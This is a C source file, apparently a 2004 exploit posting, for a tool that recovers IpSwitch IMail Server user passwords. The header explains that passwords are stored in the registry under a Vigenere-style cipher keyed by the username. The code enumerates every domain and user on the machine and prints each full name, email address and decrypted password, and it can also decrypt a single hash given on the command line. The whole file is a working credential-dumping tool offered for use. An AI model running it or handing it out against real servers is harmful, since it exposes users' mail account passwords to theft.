
/*************************************************************************************************
*       IpSwitch IMail Server <= ver 8.1 User Password Decryption
*
*       by Adik < netmaniac[at]hotmail.KG >
*
*       IpSwitch IMail Server uses a weak encryption algorithm to encrypt its user passwords. It uses a
*       polyalphabetic Vigenere cipher to encrypt its user passwords. This encryption scheme is
*       relatively easy to break. In order to decrypt a user password we need a key. IMail uses the username
*       as the key to encrypt its user passwords. The server stores user passwords in the registry under the key
*       "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
*       Before decrypting the password, convert all upper case characters in the username to lower case
*       characters. We use the username as the key to decrypt our password.
*       In order to get our plain text password, we do as follows:
*       1) Subtract the hex code of the first username character from the hex code of the first password hash character.
*          The resulting hex code will be our first decrypted password character.
*       2) Repeat the above step for the rest of the chars.
*
*       Look below, everything is dead simple ;)
*       eg:
*
*       USERNAME:               netmaniac
*       PASSWORDHASH:   D0CEE7D5CCD3D4C7D2E0CAEAD2D3
*       --------------------------------------------
*
*       D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3       <- password hash
* -     6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61       <- hex codes of username
*       n  e  t  m  a  n  i  a  c  n  e  t  m  a        <- username is a key
*       -----------------------------------------
*       62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72       <- hex codes of decrypted password
*       b  i  s  h  k  e  k  f  o  r  e  v  e  r        <- actual decrypted password
*
*
*       pwdhash_hex_code                username_hex_code               decrypted_password
*       ------------------------------------------------------------------
*                       D0                      -               6E (n)                  =       62 (b)
*                       CE                      -               65 (e)                  =       69 (i)
*                       E7                      -               74 (t)                  =       73 (s)
*                       D5                      -               6D (m)                  =       68 (h)
*                       CC                      -               61 (a)                  =       6B (k)
*                       D3                      -               6E (n)                  =       65 (e)
*                       D4                      -               69 (i)                  =       6B (k)
*                       C7                      -               61 (a)                  =       66 (f)
*                       D2                      -               63 (c)                  =       6F (o)
*                       E0                      -               6E (n)                  =       72 (r)
*                       CA                      -               65 (e)                  =       65 (e)
*                       EA                      -               74 (t)                  =       76 (v)
*                       D2                      -               6D (m)                  =       65 (e)
*                       D3                      -               61 (a)                  =       72 (r)
*       ------------------------------------------------------------------
*
*       I've included a lil proggie to dump all the usernames/passwords from the local machine's registry.
*       Have fun!
*       //Send bug reports to netmaniac[at]hotmail.KG
*
*       Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
*
*       [16/August/2004] Bishkek
**************************************************************************************************/
  61. //#include "stdafx.h"
  62. #include <stdio.h>
  63. #include <stdlib.h>
  64. #include <string.h>
  65. #include <ctype.h>
  66. #include <windows.h>
  67. #define snprintf        _snprintf
  68. #pragma comment(lib,"advapi32")
  69. #define ALLOWED_USERNAME_CHARS  "A-Z,a-z,0-9,-,_,."
  70. #define MAX_NUM 1024 //500
  71. #define DOMAINZ "Software\\IpSwitch\\IMail\\Domains"
  72. #define VER     "1.1"
  73. #define MAXSIZE 100
/* Counters behind the summary lines printed by dump_registry_pwds():
 * total_accs is bumped by get_usr_pwds() and reset for every domain,
 * total_domainz / total_domain_accs accumulate over the whole run. */
int total_accs=0;
int total_domainz=0,total_domain_accs=0;
  77. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
/* Print the tool's banner; VER is the version macro defined at the top of the file. */
void greetz(void)
{
        printf("\n\t--= [ IpSwitch IMail Server User Password Decrypter ver %s] =--\n\n"
               "\t\t (c) 2004 by Adik ( netmaniac [at] hotmail.KG )\n\n\n",
               VER);
}
  83. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
/* Print the command-line help: the two invocation forms plus an example. */
void usage(void)
{
        static const char rule[] =
                "------------------------------------------------------------------------\n";

        fputs(rule, stdout);
        fputs(" Imailpwdump [-d] -- Dumps IMail Server user/pwds from local registry\n\n"
              " Imailpwdump [username] [passwordhash] -- User/PwdHash to decrypt\n\n"
              " eg: Imailpwdump netmaniac D0CEE7D5CCD3D4C7D2E0CAEAD2D3\n", stdout);
        fputs(rule, stdout);
}
  93. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
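/*
 * Decode a string of hex digit pairs into raw bytes.
 *
 * hexstring: NUL-terminated text such as "D0CEE7"; must have an even number
 *            of characters, at most MAXSIZE of them, and only hex digits.
 * outbuff:   receives strlen(hexstring)/2 bytes followed by a NUL; the caller
 *            must provide at least MAXSIZE/2 + 1 bytes.
 *
 * Invalid input prints a message and terminates the process with exit(1),
 * matching the rest of this tool's error handling.  A decoded 0x00 byte ends
 * the resulting C string early, since callers measure outbuff with strlen().
 *
 * The old memset(outbuff, 0, strlen(outbuff)) cleared nothing useful (the
 * callers pass an empty string) and the result was never terminated here;
 * both are replaced by the explicit terminator at the end.
 */
void str2hex(char *hexstring, char *outbuff)
{
        size_t len = strlen(hexstring);

        if (len % 2) {
                printf(" Incorrect password hash!\n");
                exit(1);
        }
        if (len > MAXSIZE) {
                printf(" Password hash is too long! \n");
                exit(1);
        }
        for (size_t i = 0; i < len; i++) {
                /* Reject non-hex text up front: strtoul() would otherwise turn
                 * it into 0 and silently truncate the decoded string. */
                if (!isxdigit((unsigned char)hexstring[i])) {
                        printf(" Incorrect password hash!\n");
                        exit(1);
                }
        }

        size_t c = 0;
        for (size_t i = 0; i < len; i += 2, c++) {
                char pair[3] = { hexstring[i], hexstring[i + 1], '\0' };
                outbuff[c] = (char)(unsigned char)strtoul(pair, NULL, 16);
        }
        outbuff[c] = '\0';
}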
  116. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
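/*
 * Lower-case a username in place so it can serve as the decryption key.
 *
 * input: NUL-terminated username, modified in place.  Only letters, digits,
 *        '-', '_' and '.' are accepted (see ALLOWED_USERNAME_CHARS).
 *
 * This function only warns: on an over-long name or a bad character it
 * prints a message and returns, leaving `input` partially converted, and
 * the callers go on to use whatever is left as the key.
 */
void str2smallcase(char *input)
{
        size_t len = strlen(input);

        if (len > MAXSIZE) {
                printf(" Username too long! \n");
                return;
        }
        for (size_t i = 0; i < len; i++) {
                /* <ctype.h> functions take an int in unsigned char range;
                 * passing a plain (possibly negative) char is undefined. */
                unsigned char ch = (unsigned char)input[i];

                if (isalnum(ch) || ch == '-' || ch == '_' || ch == '.') {
                        input[i] = (char)tolower(ch);
                } else {
                        printf(" Bad characters in username!\n Allowed characters: %s\n", ALLOWED_USERNAME_CHARS);
                        return;
                }
        }
}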
  135. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
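/*
 * Extend the key in place by repeating it until it is `size` characters
 * long (e.g. "netmaniac" with size 14 becomes "netmaniacnetma"), the way a
 * Vigenere key is cycled across the message.
 *
 * input: NUL-terminated key; the caller's buffer must hold size + 1 bytes.
 * size:  desired length.  A key that is already that long or longer, and an
 *        empty key, are left unchanged.
 *
 * The repeated characters are read from the start of `input` itself, which
 * is never overwritten, so the fixed-size temporary copy (and its unbounded
 * strcpy) is not needed.  The loop index also no longer leaks out of the
 * for statement, which did not compile as C99+.
 */
void populate(char *input, unsigned int size)
{
        size_t len = strlen(input);

        if (len == 0 || size <= len) {
                return;
        }
        for (size_t i = len; i < size; i++) {
                input[i] = input[(i - len) % len];
        }
        input[size] = '\0';
}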
  150. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
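/*
 * Recover the clear-text password from IMail's Vigenere-style encoding:
 * each byte of the stored hash has the matching key byte (the lower-cased,
 * cycled username, see populate()) subtracted from it, modulo 256.
 *
 * username: key, at least strlen(pwdhash) characters long.
 * pwdhash:  raw hash bytes as produced by str2hex() (NUL-terminated, so a
 *           0x00 byte in the hash ends the input early).
 * outbuff:  receives strlen(pwdhash) bytes plus a NUL; must hold at least
 *           strlen(pwdhash) + 1 bytes.
 *
 * If the key is shorter than the hash nothing is written and outbuff is left
 * untouched; the callers pass a pre-zeroed buffer and print an empty string.
 *
 * The former memset(outbuff, 0, sizeof(outbuff)) only cleared sizeof(char *)
 * bytes and is gone; the explicit terminator makes it unnecessary.  The loop
 * index no longer leaks out of the for statement.
 */
void imail_decrypt(char *username, char *pwdhash, char *outbuff)
{
        size_t hashlen = strlen(pwdhash);

        if (hashlen > strlen(username)) {
                return;
        }
        for (size_t i = 0; i < hashlen; i++) {
                unsigned int h = (unsigned char)pwdhash[i];
                unsigned int k = (unsigned char)username[i];

                /* Unsigned arithmetic makes the wrap-around explicit instead
                 * of relying on the int-to-char conversion. */
                outbuff[i] = (char)(unsigned char)(h - k);
        }
        outbuff[hashlen] = '\0';
}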
  163. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
/*
 * Read one IMail user from the registry and print the decrypted password.
 *
 * subkey: full path (below HKEY_LOCAL_MACHINE) of the user's key.
 * usr:    the username; it is lower-cased IN PLACE by str2smallcase(), so the
 *         caller's buffer is modified and the "Username:" line shows the
 *         lower-cased form.
 *
 * Reads the "Password", "FullName" and "MailAddr" values; a missing value
 * makes the function return silently without counting the account.  A
 * failure to open the key aborts the whole program via exit(1).
 */
void get_usr_pwds(char *subkey,char *usr)
{
        long res;
        HKEY hPwdKey;
        char username[MAXSIZE]="";
        /* passwd holds at most MAXSIZE/2 decoded bytes, because str2hex()
         * rejects hex text longer than MAXSIZE characters. */
        char passwdhash[MAXSIZE*2]="", passwd[MAXSIZE]="",clearpasswd[MAXSIZE]="";
        char fullname[MAXSIZE]="";
        char email[MAXSIZE]="";
        /* The value type is received but never checked; a non-REG_SZ value
         * would be treated as text. */
        DWORD lType;
        /* Sizes are one short of the buffers so the zero-initialised last byte
         * keeps each string terminated even if the stored value has no NUL. */
        DWORD passwdhashsz=sizeof(passwdhash)-1,fullnamesz=MAXSIZE-1,emailsz=MAXSIZE-1;

                res = RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_ALL_ACCESS,&hPwdKey);
                if(res!=ERROR_SUCCESS)
                {
                        /* %d with a long argument: matches on 32-bit Windows,
                         * not on platforms where long is 64 bits. */
                        printf(" Error opening key %s! Error #:%d\n",subkey,res);
                        /* Terminates the whole dump rather than skipping this user. */
                        exit(1);
                }

                if(RegQueryValueEx(hPwdKey,"Password",0,&lType,(LPBYTE)passwdhash,&passwdhashsz)!= ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }
                if(RegQueryValueEx(hPwdKey,"FullName",0,&lType,(LPBYTE)fullname,&fullnamesz)!= ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }
                if(RegQueryValueEx(hPwdKey,"MailAddr",0,&lType,(LPBYTE)email,&emailsz)!=ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }


                /* Key = lower-cased username, cycled to the hash length. */
                str2smallcase(usr);
                strncpy(username,usr,sizeof(username)-1);
                str2hex(passwdhash,passwd);
                if(strlen(passwd)>strlen(username))
                        populate(username,strlen(passwd));
                imail_decrypt(username,passwd,clearpasswd);

                printf( "------------------------------------------------------------------------\n"
                                " FullName:\t %s\n"
                                " Email:\t\t %s\n"
                                " Username:\t %s\n"
                                " Password:\t %s\n",
                                fullname,email,usr,clearpasswd);
        total_accs++;
        RegCloseKey(hPwdKey);
}
  218. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
/*
 * Walk every domain under DOMAINZ and every user under each domain's
 * "Users" key, calling get_usr_pwds() for each, then print the totals.
 *
 * Uses the file-scope counters total_accs (reset per domain),
 * total_domain_accs and total_domainz.  Exits the process if the domain
 * key cannot be opened.
 */
void dump_registry_pwds()
{
        HKEY hKey,hUserKey;
        DWORD domRes=0,usrRes=0, domlen=0,userlen=0,domIndex=0,userIndex=0;
        /* Required out-parameter of RegEnumKeyEx; its value is never read. */
        FILETIME ftime;
        char domain[150]="";
        char user[150]="";
        char tmpbuff[MAX_NUM]="";
        char usrtmpbuff[MAX_NUM]="";
        domRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,DOMAINZ,0,KEY_ALL_ACCESS,&hKey);
        if(domRes!=ERROR_SUCCESS)
        {
                printf(" Error opening key '%s'!\n IMail not installed?? Error #:%d\n",DOMAINZ,domRes);
                exit(1);
        }
        do
        {
                /* Length is re-armed before every call: RegEnumKeyEx overwrites it. */
                domlen=sizeof(domain)-1;
                domRes=RegEnumKeyEx(hKey,domIndex,domain,&domlen,NULL,NULL,NULL,&ftime);
                /* Only "no more items" ends the loop; any other error code is
                 * treated like success, so e.g. an over-long name would print
                 * whatever is left in `domain` from the previous iteration. */
                if(domRes!=ERROR_NO_MORE_ITEMS)
                {
                        printf("\n DOMAIN:\t [ %s ]\n",domain);
                        userIndex=0;
                        total_accs=0;
                        /* snprintf is _snprintf here (see the #define at the top); the
                         * size-1 argument leaves the zero-initialised last byte as a
                         * terminator if the path is truncated. */
                        snprintf(tmpbuff,sizeof(tmpbuff)-1,"%s\\%s\\Users",DOMAINZ,domain);
                        usrRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,tmpbuff,0,KEY_ALL_ACCESS,&hUserKey);
                        if(usrRes==ERROR_SUCCESS)
                        {
                                do
                                {
                                        userlen=sizeof(user)-1;
                                        usrRes=RegEnumKeyEx(hUserKey,userIndex,user,&userlen,NULL,NULL,NULL,&ftime);
                                        if(usrRes!=ERROR_NO_MORE_ITEMS)
                                        {
                                                snprintf(usrtmpbuff,sizeof(usrtmpbuff)-1,"%s\\%s\\Users\\%s",DOMAINZ,domain,user);
                                                /* Note: get_usr_pwds() lower-cases `user` in place. */
                                                get_usr_pwds(usrtmpbuff,user);
                                        }
                                        userIndex++;
                                }
                                while(usrRes!=ERROR_NO_MORE_ITEMS);
                                RegCloseKey(hUserKey);
                                printf("\n\t Total:\t %d Accounts\n",total_accs);
                                total_domain_accs += total_accs;
                                total_domainz++;
                        }
                        domIndex++;
                }
        }
        while(domRes != ERROR_NO_MORE_ITEMS);
        RegCloseKey(hKey);
        printf("\n Total:\t %d Domains, %d Accounts\n",total_domainz,total_domain_accs);

}
  274. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
/*
 * Command-line path: decrypt a single username / hex-hash pair and print it.
 *
 * usr:    username; lower-cased in place by str2smallcase().
 * passwd: the password hash as hex text, decoded by str2hex().
 */
void decrypt_usr_pass(char *usr, char *passwd)
{
        char key[MAX_NUM] = "";
        char hashbytes[MAX_NUM] = "";
        char clear[250] = "";

        /* Key: the lower-cased username, copied into a bounded buffer. */
        str2smallcase(usr);
        strncpy(key, usr, sizeof(key) - 1);
        /* Hash: hex text decoded to raw bytes. */
        str2hex(passwd, hashbytes);

        printf("------------------------------------------------------------------------\n");
        printf(" Username:\t\t %s\n"
               " Passwordhash:\t\t %s\n", usr, passwd);

        /* Cycle the key until it covers every hash byte, then decrypt. */
        size_t hashlen = strlen(hashbytes);
        if (hashlen > strlen(key)) {
                populate(key, hashlen);
        }
        imail_decrypt(key, hashbytes, clear);

        printf(" Decrypted passwd:\t %s\n", clear);
        printf("------------------------------------------------------------------------\n");
}
  294. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
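/*
 * Entry point.  Two modes:
 *   Imailpwdump -d                         dump from the local registry
 *   Imailpwdump <username> <passwordhash>  decrypt one hash
 * Anything else prints the usage text.
 *
 * Returns 0 on success and 1 when only the usage text was shown.  `int main`
 * replaces the non-conforming `void main`, which left the exit status
 * undefined for scripts checking it.
 */
int main(int argc, char *argv[])
{
        greetz();

        /* strncmp(..., 2) treats any argument beginning with "-d" as the
         * dump switch, and refuses it as a username in the two-argument form. */
        if (argc == 2 && strncmp(argv[1], "-d", 2) == 0) {
                dump_registry_pwds();
        } else if (argc == 3 && strncmp(argv[1], "-d", 2) != 0) {
                decrypt_usr_pass(argv[1], argv[2]);
        } else {
                usage();
                return 1;
        }
        return 0;
}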
  318. /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/